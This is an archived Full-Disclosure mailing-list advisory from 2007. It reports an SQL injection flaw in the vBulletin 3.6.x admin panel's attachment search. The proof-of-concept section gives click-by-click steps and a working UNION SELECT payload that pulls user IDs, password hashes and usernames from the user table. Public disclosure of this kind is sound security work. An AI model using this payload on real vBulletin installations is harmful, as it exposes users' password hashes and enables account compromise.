[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] vbulletin admincp sql injection

To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] vbulletin admincp sql injection
From: disfigure <disfigure@xxxxxxxxx>
Date: Tue, 13 Mar 2007 12:41:59 -0500

/****************************************/

CREDIT:
discovered by meto5757 and disfigure

PRODUCT:
vBulletin
http://www.vbulletin.com/

VULNERABILITY:
SQL Injection

NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5

POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:

') union select 1,1,1,1,1,userid,password,1,username from user -- 9

greets: w4ck1ng.com

/****************************************/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [ MDKSA-2007:062 ] - Updated xine-lib packages to address buffer overflow vulnerability
Next by Date: [Full-disclosure] [ MDKSA-2007:061 ] - Updated mplayer packages to address buffer overflow vulnerability
Previous by thread: [Full-disclosure] [ MDKSA-2007:062 ] - Updated xine-lib packages to address buffer overflow vulnerability
Next by thread: [Full-disclosure] [ MDKSA-2007:061 ] - Updated mplayer packages to address buffer overflow vulnerability
Index(es):
- Date
- Thread